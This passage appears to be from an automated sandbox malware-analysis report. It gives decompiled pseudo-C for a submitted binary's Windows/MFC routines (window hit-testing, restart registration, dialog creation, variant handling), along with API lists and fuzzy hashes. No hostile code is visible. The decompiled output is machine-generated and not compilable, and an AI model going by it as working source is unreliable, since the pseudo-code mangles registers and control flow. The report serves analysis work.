      				if(_t45 == 0) {
      					_push(__edi);
      					ClientToScreen(_t51,  &_v36);
      					_push(5);
      					while(1) {
      						_t51 = GetWindow(_t51, ??);
      						if(_t51 == 0) {
      							break;
      						}
      						if(GetDlgCtrlID(_t51) != 0xffff && (GetWindowLongA(_t51, 0xfffffff0) & 0x10000000) != 0) {
      							_v24.left = _v24.left & 0x00000000;
      							_v24.top = _v24.top & 0x00000000;
      							_v24.right = _v24.right & 0x00000000;
      							_v24.bottom = _v24.bottom & 0x00000000;
      							GetWindowRect(_t51,  &_v24);
      							_push(_v36.y);
      							if(PtInRect( &_v24, _v36) != 0) {
      								_v28 = _t51;
      							}
      						}
      						_push(2);
      					}
      					_t39 = _v28;
      					_pop(_t49);
      					L10:
      					return E00AAB46A(_t39, _t43, _v8 ^ _t52, _t48, _t49, _t51);
      				}
      				asm("sbb eax, eax");
      				_t39 =  ~(_t29 - _t51) & _t45;
      				goto L10;
      			}

      APIs
      • RealChildWindowFromPoint.USER32(?,?,?), ref: 009BBBDE
      • ClientToScreen.USER32(?,?), ref: 009BBBFD
      • GetWindow.USER32(?,00000005), ref: 009BBC60
      Yara matches
      Similarity
      • API ID: Window$ChildClientFromPointRealScreen
      • String ID:
      • API String ID: 2518355518-0
      • Opcode ID: d9ca6be3674fb9ebb0b5b64c83fa15899bae0fb5b4df967d08850eddc1f99a95
      • Instruction ID: 5100670e78244e8f7579034742c0d55546dbff9da7adbecdbffbb52a632922ae
      • Opcode Fuzzy Hash: d9ca6be3674fb9ebb0b5b64c83fa15899bae0fb5b4df967d08850eddc1f99a95
      • Instruction Fuzzy Hash: 5F21717291161AAFDB00CFA8DD09FFE7BB8EF09325F100119E512E2190DB789A01CBA0
      Uniqueness

      Uniqueness Score: -1.00%

      C-Code - Quality: 55%
      			E009B1888(intOrPtr* __ecx) {
      				signed int _v8;
      				intOrPtr* _v12;
      				void* __ebp;
      				intOrPtr* _t16;
      				intOrPtr* _t21;
      				struct HINSTANCE__* _t28;
      				intOrPtr* _t29;
      				void* _t35;
      
      				_t23 = __ecx;
      				_push(__ecx);
      				_push(__ecx);
      				_v12 = __ecx;
      				_t28 = GetModuleHandleW(L"KERNEL32.DLL");
      				if(_t28 == 0) {
      					E009B8782(_t23);
      				}
      				_t21 = GetProcAddress(_t28, "ApplicationRecoveryInProgress");
      				_t29 = GetProcAddress(_t28, "ApplicationRecoveryFinished");
      				if(_t21 != 0 && _t29 != 0) {
      					_v8 = _v8 & 0x00000000;
      					 *_t21( &_v8);
      					if(_v8 == 0) {
      						_t35 = 1;
      						_t16 =  *((intOrPtr*)( *_v12 + 0xfc))();
      						if(_t16 != 0) {
      							_t35 =  *((intOrPtr*)( *_t16 + 0x38))();
      						}
      						 *_t29(_t35);
      					}
      				}
      				return 0;
      			}

      APIs
      • GetModuleHandleW.KERNEL32(KERNEL32.DLL), ref: 009B189A
      • GetProcAddress.KERNEL32(00000000,ApplicationRecoveryInProgress), ref: 009B18B7
      • GetProcAddress.KERNEL32(00000000,ApplicationRecoveryFinished), ref: 009B18C1
        • Part of subcall function 009B8782: __CxxThrowException@8.LIBCMT ref: 009B8798
      Strings
      Yara matches
      Similarity
      • API ID: AddressProc$Exception@8HandleModuleThrow
      • String ID: ApplicationRecoveryFinished$ApplicationRecoveryInProgress$KERNEL32.DLL
      • API String ID: 2144170044-4287352451
      • Opcode ID: d7e6d4710418f6a75d0856f4dd5cea6181536ce0b304889dee80f1d7800f7c7b
      • Instruction ID: 56004e74d87320f33dc82818572e9f12347ced880c1d13f64332969fe0a525ea
      • Opcode Fuzzy Hash: d7e6d4710418f6a75d0856f4dd5cea6181536ce0b304889dee80f1d7800f7c7b
      • Instruction Fuzzy Hash: 6501B136A00319AFC7109BB5C958AAF7BBCFF95360F15046AE502A3210DA74CD01C6A0
      Uniqueness

      Uniqueness Score: -1.00%

      C-Code - Quality: 58%
      			E009ABB2C(void* __ebx, void* __ecx, void* __edi, void* __esi, void* __eflags) {
      				struct HINSTANCE__* _t20;
      				intOrPtr* _t23;
      				struct HINSTANCE__* _t27;
      				intOrPtr* _t30;
      				void* _t32;
      				void* _t35;
      
      				_t29 = __ecx;
      				_push(0);
      				E00AAD232(0xac7f43, __ebx, __edi, __esi);
      				_t32 = __ecx;
      				 *(__ecx + 0x38) =  *(__ecx + 0x38) & 0x00000000;
      				_t37 =  *0xd0fb40 & 0x00000001;
      				if(( *0xd0fb40 & 0x00000001) == 0) {
      					 *0xd0fb40 =  *0xd0fb40 | 0x00000001;
      					 *(_t35 - 4) =  *(_t35 - 4) & 0x00000000;
      					_push("user32.dll");
      					_t27 = E009AB6E5(__ecx, __esi, _t37);
      					 *(_t35 - 4) =  *(_t35 - 4) | 0xffffffff;
      					_pop(_t29);
      					 *0xd0fb3c = _t27;
      				}
      				_t20 =  *0xd0fb3c; // 0x0
      				if(_t20 == 0) {
      					_t20 = E009B8782(_t29);
      				}
      				if(( *0xd0fb40 & 0x00000002) == 0) {
      					 *0xd0fb40 =  *0xd0fb40 | 0x00000002;
      					 *0xd0fb38 = GetProcAddress(_t20, "RegisterTouchWindow");
      				}
      				if(( *0xd0fb40 & 0x00000004) == 0) {
      					 *0xd0fb40 =  *0xd0fb40 | 0x00000004;
      					 *0xd0fb34 = GetProcAddress( *0xd0fb3c, "UnregisterTouchWindow");
      				}
      				_t30 =  *0xd0fb38; // 0x0
      				if(_t30 == 0) {
      					L13:
      					_t21 = 0;
      					__eflags = 0;
      					goto L14;
      				} else {
      					_t23 =  *0xd0fb34; // 0x0
      					if(_t23 == 0) {
      						goto L13;
      					}
      					if( *((intOrPtr*)(_t35 + 8)) != 0) {
      						 *((intOrPtr*)(_t32 + 0x38)) =  *_t30( *((intOrPtr*)(_t32 + 0x20)),  *((intOrPtr*)(_t35 + 0xc)));
      					} else {
      						_t21 =  *_t23( *((intOrPtr*)(_t32 + 0x20)));
      					}
      					L14:
      					return E00AAD30A(_t21);
      				}
      			}

      APIs
      • __EH_prolog3.LIBCMT ref: 009ABB33
      • GetProcAddress.KERNEL32(00000000,RegisterTouchWindow), ref: 009ABB90
      • GetProcAddress.KERNEL32(UnregisterTouchWindow,00000000), ref: 009ABBB2
        • Part of subcall function 009AB6E5: ActivateActCtx.KERNEL32(?,?,00B0BAF0,00000010,009ABB5C,user32.dll,00000000,009ACA56,00000000,00000000), ref: 009AB705
      Strings
      Yara matches
      Similarity
      • API ID: AddressProc$ActivateH_prolog3
      • String ID: RegisterTouchWindow$UnregisterTouchWindow$user32.dll
      • API String ID: 1001276555-2470269259
      • Opcode ID: 748af15ccfe0c9c10dee47921f76986cb3659021f9e6682ead3a175b0a3d9c0e
      • Instruction ID: 9dc4f48d2be70a0907d4eb338d7d116742943199fec648b6af5cb7bcc27cdd7a
      • Opcode Fuzzy Hash: 748af15ccfe0c9c10dee47921f76986cb3659021f9e6682ead3a175b0a3d9c0e
      • Instruction Fuzzy Hash: 7011BFB0640301AFDB34EB60EE65B557BE4BB05328F204529E84AD2BB2CB749940CFB0
      Uniqueness

      Uniqueness Score: -1.00%

      C-Code - Quality: 58%
      			E009B181C(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24) {
      				void* __ebp;
      				void* _t12;
      				intOrPtr* _t14;
      				void* _t15;
      				struct HINSTANCE__* _t16;
      				intOrPtr* _t18;
      
      				_t16 = GetModuleHandleW(L"KERNEL32.DLL");
      				if(_t16 == 0) {
      					E009B8782(_t15);
      				}
      				_t14 = GetProcAddress(_t16, "RegisterApplicationRestart");
      				_t18 = GetProcAddress(_t16, "RegisterApplicationRecoveryCallback");
      				if(_t14 == 0 || _t18 == 0) {
      					L7:
      					return 0;
      				}
      				_t12 =  *_t14(_a4, _a8);
      				if(_t12 == 0) {
      					if(_a12 == _t12) {
      						goto L7;
      					}
      					_t12 =  *_t18(_a12, _a16, _a20, _a24);
      					if(_t12 == 0) {
      						goto L7;
      					}
      				}
      				return _t12;
      			}

      APIs
      • GetModuleHandleW.KERNEL32(KERNEL32.DLL), ref: 009B1829
      • GetProcAddress.KERNEL32(00000000,RegisterApplicationRestart), ref: 009B1846
      • GetProcAddress.KERNEL32(00000000,RegisterApplicationRecoveryCallback), ref: 009B1850
        • Part of subcall function 009B8782: __CxxThrowException@8.LIBCMT ref: 009B8798
      Strings
      • KERNEL32.DLL, xrefs: 009B1824
      • RegisterApplicationRestart, xrefs: 009B1840
      • RegisterApplicationRecoveryCallback, xrefs: 009B1848
      Yara matches
      Similarity
      • API ID: AddressProc$Exception@8HandleModuleThrow
      • String ID: KERNEL32.DLL$RegisterApplicationRecoveryCallback$RegisterApplicationRestart
      • API String ID: 2144170044-723216104
      • Opcode ID: 28e3e0542b6d37f596eb42b7e59ce221a5c0b603b92183fe9116e700a09581bc
      • Instruction ID: 307d63105f1bdd8955927021b0a8b97a6885c942220f3f1639346f1315f49dc3
      • Opcode Fuzzy Hash: 28e3e0542b6d37f596eb42b7e59ce221a5c0b603b92183fe9116e700a09581bc
      • Instruction Fuzzy Hash: 07F04F3650021ABB8F225FA69D50D9B3E6EFF947B47444023F91592110DB71CC21DAA0
      Uniqueness

      Uniqueness Score: -1.00%

      C-Code - Quality: 100%
      			E009BE5AC(void* __ecx) {
      				struct HBRUSH__* _t14;
      				void* _t18;
      
      				_t18 = __ecx;
      				 *((intOrPtr*)(_t18 + 0x28)) = GetSysColor(0xf);
      				 *((intOrPtr*)(_t18 + 0x2c)) = GetSysColor(0x10);
      				 *((intOrPtr*)(_t18 + 0x30)) = GetSysColor(0x14);
      				 *((intOrPtr*)(_t18 + 0x34)) = GetSysColor(0x12);
      				 *((intOrPtr*)(_t18 + 0x38)) = GetSysColor(6);
      				 *((intOrPtr*)(_t18 + 0x24)) = GetSysColorBrush(0xf);
      				_t14 = GetSysColorBrush(6);
      				 *(_t18 + 0x20) = _t14;
      				return _t14;
      			}

      APIs
      • GetSysColor.USER32(0000000F), ref: 009BE5BA
      • GetSysColor.USER32(00000010), ref: 009BE5C1
      • GetSysColor.USER32(00000014), ref: 009BE5C8
      • GetSysColor.USER32(00000012), ref: 009BE5CF
      • GetSysColor.USER32(00000006), ref: 009BE5D6
      • GetSysColorBrush.USER32(0000000F), ref: 009BE5E3
      • GetSysColorBrush.USER32(00000006), ref: 009BE5EA
      Yara matches
      Similarity
      • API ID: Color$Brush
      • String ID:
      • API String ID: 2798902688-0
      • Opcode ID: a267769f8a90cfc9d03250af2f2db05e64404917cf643283451e21d8612cbf5e
      • Instruction ID: b3f96fd95dd03a44b4fc6efbf8d69926e6eef0530adf4d0ce7a24cfd66f5c827
      • Opcode Fuzzy Hash: a267769f8a90cfc9d03250af2f2db05e64404917cf643283451e21d8612cbf5e
      • Instruction Fuzzy Hash: B1F0FE719417445BD730BBB25D09B47BAE1EFC4710F02092AE2458B990D6B6E441DF40
      Uniqueness

      Uniqueness Score: -1.00%

      C-Code - Quality: 68%
      			E00A0F545(void* __ebx, intOrPtr __ecx, intOrPtr __edx, CHAR* __edi, void* __esi, void* __eflags) {
      				CHAR* _t116;
      				CHAR* _t117;
      				char _t130;
      				char _t135;
      				CHAR* _t136;
      				char _t139;
      				void* _t140;
      				char _t143;
      				char _t146;
      				signed short _t149;
      				signed int _t151;
      				CHAR* _t154;
      				signed int _t155;
      				signed int _t165;
      				char _t169;
      				void* _t172;
      				void* _t176;
      				intOrPtr _t181;
      				CHAR* _t183;
      				CHAR* _t185;
      				char* _t188;
      				void* _t189;
      				CHAR* _t190;
      				char* _t192;
      				void* _t193;
      				long long _t197;
      
      				_t193 = __eflags;
      				_t182 = __edi;
      				_t181 = __edx;
      				_push(0x50);
      				E00AAD2D1(0xacd030, __ebx, __edi, __esi);
      				 *((intOrPtr*)(_t189 - 0x2c)) = __ecx;
      				E009BD7C9(_t189 - 0x44, _t193,  *((intOrPtr*)(__ecx + 0x1c)));
      				_t169 =  *(_t189 + 8);
      				_t116 =  *(_t169 + 8);
      				 *(_t189 - 4) =  *(_t189 - 4) & 0x00000000;
      				 *(_t189 - 0x19) = 0;
      				 *(_t189 - 0x18) = _t116;
      				if(_t116 == 0) {
      					 *(_t189 - 0x18) = _t189 - 0x19;
      				}
      				_t117 = lstrlenA( *(_t189 - 0x18));
      				_t195 =  *(_t189 + 0xc) & 0x0000000c;
      				_t185 = _t117;
      				 *((intOrPtr*)(_t189 - 0x20)) =  *((intOrPtr*)(_t169 + 0x10));
      				 *(_t189 - 0x24) =  *(_t169 + 0xc) & 0x0000ffff;
      				if(( *(_t189 + 0xc) & 0x0000000c) == 0) {
      					L8:
      					_t185 =  *(_t189 + 0x14);
      					_push(_t185[8] << 4);
      					_t122 = E009B935A(_t169, _t181, _t182, _t185, __eflags);
      					_pop(_t172);
      					__eflags = _t122;
      					if(_t122 == 0) {
      						L4:
      						 *(_t189 - 4) =  *(_t189 - 4) | 0xffffffff;
      						E009BCF01(_t122, _t189 - 0x44);
      						L48:
      						return E00AAD32D(_t169, _t182, _t185);
      					}
      					_t185 = _t185[8];
      					__eflags = _t185 - 0x7ffffff;
      					if(_t185 > 0x7ffffff) {
      						goto L4;
      					}
      					E00AAD9E0(_t185 << 4);
      					 *(_t189 - 0x10) = _t190;
      					 *(_t189 - 0x28) = _t190;
      					E00AAB3F0( *(_t189 - 0x28), 0, _t185 << 4);
      					_t192 =  &(_t190[0xc]);
      					_t182 = E00A0ED4E(_t172,  *(_t189 - 0x18),  *(_t189 - 0x24));
      					_t46 =  &(_t182[0x10]); // 0x10
      					_t187 = _t46;
      					_push(_t46);
      					_t130 = E009B935A(_t169, _t181, _t182, _t46, __eflags);
      					__eflags = _t130;
      					if(_t130 != 0) {
      						E00AAD9E0(_t187);
      						 *(_t189 - 0x10) = _t192;
      						_t169 = 0;
      						_t188 = _t192;
      						 *((intOrPtr*)(_t189 - 0x58)) = 0xae3f48;
      						 *((intOrPtr*)(_t189 - 0x54)) = 0;
      						 *((intOrPtr*)(_t189 - 0x48)) = 0;
      						 *((intOrPtr*)(_t189 - 0x4c)) = 0;
      						 *((intOrPtr*)(_t189 - 0x50)) = 0;
      						_push(_t189 - 0x58);
      						_push( *(_t189 - 0x28));
      						_push( *((intOrPtr*)(_t189 + 0x18)));
      						 *(_t189 - 4) = 1;
      						_push( *(_t189 + 0x14));
      						_push( *(_t189 - 0x24));
      						_push(_t189 - 0x3c);
      						_push( *(_t189 - 0x18));
      						_push(_t188);
      						_t135 = E00A0F245(0,  *((intOrPtr*)(_t189 - 0x2c)), _t182, _t188, __eflags);
      						 *(_t189 - 0x18) = _t135;
      						__eflags = _t135;
      						if(_t135 != 0) {
      							L23:
      							_t136 =  *(_t189 + 0x14);
      							_t185 = 0;
      							__eflags = _t136[8];
      							if(_t136[8] <= 0) {
      								L26:
      								__eflags =  *(_t189 - 0x18);
      								_t176 = _t189 - 0x58;
      								if( *(_t189 - 0x18) == 0) {
      									E00A0F1B3(_t176);
      									_t182 =  *(_t189 + 0x10);
      									__eflags = _t182;
      									if(_t182 == 0) {
      										_t139 = ( *(_t189 - 0x24) & 0x0000ffff) - 8;
      										__eflags = _t139;
      										if(_t139 == 0) {
      											__imp__#6(_t169);
      											L47:
      											 *(_t189 - 4) = 0;
      											_t140 = E00A0F0D3(_t189 - 0x58);
      											 *(_t189 - 4) =  *(_t189 - 4) | 0xffffffff;
      											E009BCF01(_t140, _t189 - 0x44);
      											__eflags = 0;
      											goto L48;
      										}
      										_t143 = _t139 - 1;
      										__eflags = _t143;
      										if(_t143 == 0) {
      											L43:
      											__eflags = _t169;
      											if(_t169 != 0) {
      												 *((intOrPtr*)( *_t169 + 8))(_t169);
      											}
      											goto L47;
      										}
      										_t146 = _t143 - 3;
      										__eflags = _t146;
      										if(_t146 == 0) {
      											__imp__#9(_t189 - 0x3c);
      											goto L47;
      										}
      										__eflags = _t146 != 1;
      										if(_t146 != 1) {
      											goto L47;
      										}
      										goto L43;
      									}
      									_t149 =  *(_t189 - 0x24);
      									 *_t182 = _t149;
      									_t151 = (_t149 & 0x0000ffff) + 0xfffffffe;
      									__eflags = _t151 - 0x13;
      									if(_t151 > 0x13) {
      										goto L47;
      									}
      									switch( *((intOrPtr*)(_t151 * 4 +  &M00A0F83D))) {
      										case 0:
      											 *((short*)(__edi + 8)) = __bx;
      											goto L47;
      										case 1:
      											 *((intOrPtr*)(__edi + 8)) = __ebx;
      											goto L47;
      										case 2:
      											 *((intOrPtr*)(__edi + 8)) =  *((intOrPtr*)(__ebp - 0x3c));
      											goto L47;
      										case 3:
      											 *((long long*)(__edi + 8)) =  *((long long*)(__ebp - 0x3c));
      											goto L47;
      										case 4:
      											__eax =  *((intOrPtr*)(__ebp - 0x3c));
      											 *((intOrPtr*)(__edi + 8)) =  *((intOrPtr*)(__ebp - 0x3c));
      											__eax =  *((intOrPtr*)(__ebp - 0x38));
      											 *((intOrPtr*)(__edi + 0xc)) =  *((intOrPtr*)(__ebp - 0x38));
      											goto L47;
      										case 5:
      											__eax = 0;
      											__eflags = __bx;
      											0 | __eflags == 0x00000000 = (0 | __eflags == 0x00000000) - 1;
      											 *((short*)(__edi + 8)) = __ax;
      											goto L47;
      										case 6:
      											__esi = __ebp - 0x3c;
      											asm("movsd");
      											asm("movsd");
      											asm("movsd");
      											asm("movsd");
      											goto L47;
      										case 7:
      											goto L47;
      										case 8:
      											_t182[8] = _t169;
      											goto L47;
      									}
      								}
      								 *(_t189 - 4) = 0;
      								_t130 = E00A0F0D3(_t176);
      								_t185 =  *(_t189 - 0x18);
      								L12:
      								 *(_t189 - 4) =  *(_t189 - 4) | 0xffffffff;
      								E009BCF01(_t130, _t189 - 0x44);
      								goto L48;
      							}
      							_t183 =  *(_t189 - 0x28);
      							do {
      								__imp__#9(_t183);
      								_t154 =  *(_t189 + 0x14);
      								_t185 =  &(_t185[1]);
      								_t183 =  &(_t183[0x10]);
      								__eflags = _t185 - _t154[8];
      							} while (_t185 < _t154[8]);
      							goto L26;
      						}
      						_t155 =  *(_t189 - 0x24) & 0x0000ffff;
      						_push(_t182);
      						_push(_t188);
      						_push( *((intOrPtr*)(_t189 - 0x20)));
      						 *(_t189 - 4) = 2;
      						__eflags = _t155 - 4;
      						if(_t155 == 4) {
      							E00A88156();
      							 *((intOrPtr*)(_t189 - 0x2c)) = _t197;
      							 *((intOrPtr*)(_t189 - 0x3c)) =  *((intOrPtr*)(_t189 - 0x2c));
      							L22:
      							 *(_t189 - 4) = 1;
      							goto L23;
      						}
      						__eflags = _t155 - 5;
      						if(_t155 == 5) {
      							L20:
      							E00A88156();
      							 *((long long*)(_t189 - 0x3c)) = _t197;
      							goto L22;
      						}
      						__eflags = _t155 - 7;
      						if(_t155 == 7) {
      							goto L20;
      						}
      						__eflags = _t155 + 0xffffffec - 1;
      						if(_t155 + 0xffffffec > 1) {
      							_t169 = E00A88156();
      						} else {
      							 *((intOrPtr*)(_t189 - 0x3c)) = E00A88156();
      							 *((intOrPtr*)(_t189 - 0x38)) = _t181;
      						}
      						goto L22;
      					}
      					_t185 = 0x8007000e;
      					goto L12;
      				}
      				_t20 =  &(_t185[3]); // 0x3
      				_t182 = _t20;
      				_push(_t20);
      				if(E009B935A(_t169, _t181, _t20, _t185, _t195) != 0) {
      					E00AAD9E0(_t182);
      					 *(_t189 - 0x10) = _t190;
      					_t182 = _t190;
      					_t26 =  &(_t185[3]); // 0x3
      					E009A681A(_t182, _t26,  *(_t189 - 0x18), _t185);
      					_t165 =  *(_t169 + 0xc) & 0x0000ffff;
      					_t190 =  &(_t190[0x10]);
      					 *(_t189 - 0x18) = _t182;
      					__eflags = _t165 - 8;
      					if(_t165 == 8) {
      						_t165 = 0xe;
      					}
      					_t29 = _t189 - 0x24;
      					 *_t29 =  *(_t189 - 0x24) & 0x00000000;
      					__eflags =  *_t29;
      					_t182[_t185] = 0xff;
      					_t182[ &(_t185[1])] = _t165;
      					_t182[ &(_t185[2])] = 0;
      					 *((intOrPtr*)(_t189 - 0x20)) =  *((intOrPtr*)(_t169 + 0x14));
      					goto L8;
      				}
      				goto L4;
      			}
      0x00a0f5ec
      0x00a0f5f0
      0x00a0f5f4
      0x00a0f5fc
      0x00000000
      0x00a0f5fc
      0x00000000

      APIs
      • __EH_prolog3_catch_GS.LIBCMT ref: 00A0F54C
        • Part of subcall function 009BD7C9: ActivateActCtx.KERNEL32(?,?), ref: 009BD7EC
      • lstrlenA.KERNEL32(00000000,000000FF,00000050,009C9FC4,00000000,00000001,?,?,000000FF,?,?,?,?,?,?,00000034), ref: 00A0F57D
        • Part of subcall function 009A681A: _memcpy_s.LIBCMT ref: 009A682B
      • _memset.LIBCMT ref: 00A0F634
        • Part of subcall function 00A0F245: __EH_prolog3.LIBCMT ref: 00A0F24C
        • Part of subcall function 00A0F245: VariantChangeType.OLEAUT32(?,?,00000000,0000000C), ref: 00A0F318
        • Part of subcall function 00A0F245: SysFreeString.OLEAUT32(?), ref: 00A0F348
      • VariantClear.OLEAUT32(?), ref: 00A0F722
      Memory Dump Source
      • Source File: 00000000.00000002.245504697.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
      • Associated: 00000000.00000002.245499068.00000000009A0000.00000002.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245756146.0000000000AD6000.00000002.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245799041.0000000000B1E000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245964085.0000000000C5A000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245971843.0000000000C66000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245985069.0000000000C83000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245991562.0000000000C8D000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.246010185.0000000000CA2000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.246065048.0000000000D16000.00000002.00000001.01000000.00000003.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_9a0000_cANdLlHS4N.jbxd
      Yara matches
      Similarity
      • API ID: Variant$ActivateChangeClearFreeH_prolog3H_prolog3_catch_StringType_memcpy_s_memsetlstrlen
      • String ID:
      • API String ID: 1135064923-0
      • Opcode ID: e48559bf1a93113dea09127c07df2d7bf38e5da1944b520aaee20df94336b23f
      • Instruction ID: eed18c364c0f9f7642bb3ab53b7af72651f49b582db2309249e5e794e450f00b
      • Opcode Fuzzy Hash: e48559bf1a93113dea09127c07df2d7bf38e5da1944b520aaee20df94336b23f
      • Instruction Fuzzy Hash: 8E91B131C0020EDFCF20DFA4E9856EEBBB4BF05310F248265E415BBA91DB31A955DBA1
      Uniqueness

      Uniqueness Score: -1.00%

      C-Code - Quality: 91%
      			E009B4C39(void* __ebx, intOrPtr* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
      				signed int _t61;
      				signed int _t67;
      				signed int _t69;
      				struct HWND__* _t70;
      				signed int _t73;
      				signed int _t103;
      				void* _t114;
      				signed int _t117;
      				DLGTEMPLATE* _t118;
      				struct HWND__* _t119;
      				intOrPtr* _t121;
      				void* _t122;
      
      				_t116 = __edi;
      				_t114 = __edx;
      				_t97 = __ecx;
      				_push(0x3c);
      				E00AAD265(0xac8404, __ebx, __edi, __esi);
      				_t121 = __ecx;
      				 *((intOrPtr*)(_t122 - 0x20)) = __ecx;
      				_t126 =  *(_t122 + 0x10);
      				if( *(_t122 + 0x10) == 0) {
      					 *(_t122 + 0x10) =  *(E009BD77F(0, __edi, __ecx, _t126) + 0xc);
      				}
      				_t117 =  *(E009BD77F(0, _t116, _t121, _t126) + 0x3c);
      				 *(_t122 - 0x28) = _t117;
      				 *(_t122 - 0x14) = 0;
      				 *(_t122 - 4) = 0;
      				E009AFF05(0, _t97, _t117, _t121, _t126, 0x10);
      				E009AFF05(0, _t97, _t117, _t121, _t126, 0x3c000);
      				E009C32CC();
      				if(_t117 == 0) {
      					_t118 =  *(_t122 + 8);
      					L7:
      					__eflags = _t118;
      					if(_t118 == 0) {
      						L4:
      						_t61 = 0;
      						L26:
      						return E00AAD30A(_t61);
      					}
      					E009A5D70(_t122 - 0x1c, _t114, E009B9D52());
      					 *(_t122 - 4) = 1;
      					 *((intOrPtr*)(_t122 - 0x18)) = 0;
      					_t67 = E009C972E(__eflags, _t118, _t122 - 0x1c, _t122 - 0x18);
      					__eflags = _t67;
      					__eflags = 0 | _t67 == 0x00000000;
      					if(__eflags != 0) {
      						_push(_t118);
      						E009C96F2(_t122 - 0x38);
      						 *(_t122 - 4) = 2;
      						E009C964E(_t122 - 0x38,  *((intOrPtr*)(_t122 - 0x18)));
      						 *(_t122 - 0x14) = E009C9372(_t122 - 0x38);
      						 *(_t122 - 4) = 1;
      						E009C9364(_t122 - 0x38);
      						__eflags =  *(_t122 - 0x14);
      						if(__eflags != 0) {
      							_t118 = GlobalLock( *(_t122 - 0x14));
      						}
      					}
      					 *(_t121 + 0x60) =  *(_t121 + 0x60) | 0xffffffff;
      					 *(_t121 + 0x58) =  *(_t121 + 0x58) | 0x00000010;
      					E009AED3F(0, __eflags, _t121);
      					_t69 =  *(_t122 + 0xc);
      					__eflags = _t69;
      					if(_t69 != 0) {
      						_t70 =  *(_t69 + 0x20);
      					} else {
      						_t70 = 0;
      					}
      					_t119 = CreateDialogIndirectParamA( *(_t122 + 0x10), _t118, _t70, E009B4597, 0);
      					E009A5510( *((intOrPtr*)(_t122 - 0x1c)) + 0xfffffff0, _t114);
      					 *(_t122 - 4) =  *(_t122 - 4) | 0xffffffff;
      					_t103 =  *(_t122 - 0x28);
      					__eflags = _t103;
      					if(__eflags != 0) {
      						__eflags = _t119;
      						if(__eflags != 0) {
      							 *((intOrPtr*)( *_t103 + 0x18))(_t122 - 0x48);
      							 *((intOrPtr*)( *_t121 + 0x158))(0);
      						}
      					}
      					_t73 = E009AC9C6(0, _t119, __eflags);
      					__eflags = _t73;
      					if(_t73 == 0) {
      						 *((intOrPtr*)( *_t121 + 0x120))();
      					}
      					__eflags = _t119;
      					if(_t119 != 0) {
      						__eflags =  *(_t121 + 0x58) & 0x00000010;
      						if(( *(_t121 + 0x58) & 0x00000010) == 0) {
      							DestroyWindow(_t119);
      							_t119 = 0;
      							__eflags = 0;
      						}
      					}
      					__eflags =  *(_t122 - 0x14);
      					if( *(_t122 - 0x14) != 0) {
      						GlobalUnlock( *(_t122 - 0x14));
      						GlobalFree( *(_t122 - 0x14));
      					}
      					__eflags = _t119;
      					_t54 = _t119 != 0;
      					__eflags = _t54;
      					_t61 = 0 | _t54;
      					goto L26;
      				}
      				_push(_t122 - 0x48);
      				if( *((intOrPtr*)( *_t121 + 0x158))() != 0) {
      					_t118 =  *((intOrPtr*)( *_t117 + 0x14))(_t122 - 0x48,  *(_t122 + 8));
      					goto L7;
      				}
      				goto L4;
      			}

      Address column for the preceding C-code listing (flattened by extraction, one address per decompiled line): 0x009b4c39 to 0x009b4df5

      APIs
      • __EH_prolog3_catch.LIBCMT ref: 009B4C40
      • GlobalLock.KERNEL32 ref: 009B4D21
      • CreateDialogIndirectParamA.USER32(?,?,?,009B4597,00000000), ref: 009B4D50
      • DestroyWindow.USER32(00000000,?,00000024,009A4695,3A0E8B0C), ref: 009B4DCA
      • GlobalUnlock.KERNEL32(?,?,00000024,009A4695,3A0E8B0C), ref: 009B4DDA
      • GlobalFree.KERNEL32 ref: 009B4DE3
      Memory Dump Source
      • Source File: 00000000.00000002.245504697.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
      • Associated: 00000000.00000002.245499068.00000000009A0000.00000002.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245756146.0000000000AD6000.00000002.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245799041.0000000000B1E000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245964085.0000000000C5A000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245971843.0000000000C66000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245985069.0000000000C83000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245991562.0000000000C8D000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.246010185.0000000000CA2000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.246065048.0000000000D16000.00000002.00000001.01000000.00000003.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_9a0000_cANdLlHS4N.jbxd
      Yara matches
      Similarity
      • API ID: Global$CreateDestroyDialogFreeH_prolog3_catchIndirectLockParamUnlockWindow
      • String ID:
      • API String ID: 3003189058-0
      • Opcode ID: 0ec764f27f892a1531a4b2f5acad3b2ad4743d85a1c68b43ee0fcdc40d08ad0f
      • Instruction ID: 7d462da688d702cd5dde56c64efdcc6cfd2d4b27c26afcab3ee8e05b3ffb2239
      • Opcode Fuzzy Hash: 0ec764f27f892a1531a4b2f5acad3b2ad4743d85a1c68b43ee0fcdc40d08ad0f
      • Instruction Fuzzy Hash: 65519371901249DFCF14EFA4CA89AEE7BB9AF84320F15042DF502A72D2DB309A41DB51
      Uniqueness

      Uniqueness Score: -1.00%

      C-Code - Quality: 97%
      			E009B78CF(void* __ebx, intOrPtr __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
      				intOrPtr* _t60;
      				intOrPtr _t64;
      				struct HDC__* _t65;
      				intOrPtr _t86;
      				intOrPtr _t87;
      				void* _t106;
      				intOrPtr _t110;
      				void* _t113;
      
      				_t111 = __esi;
      				_t109 = __edi;
      				_t106 = __edx;
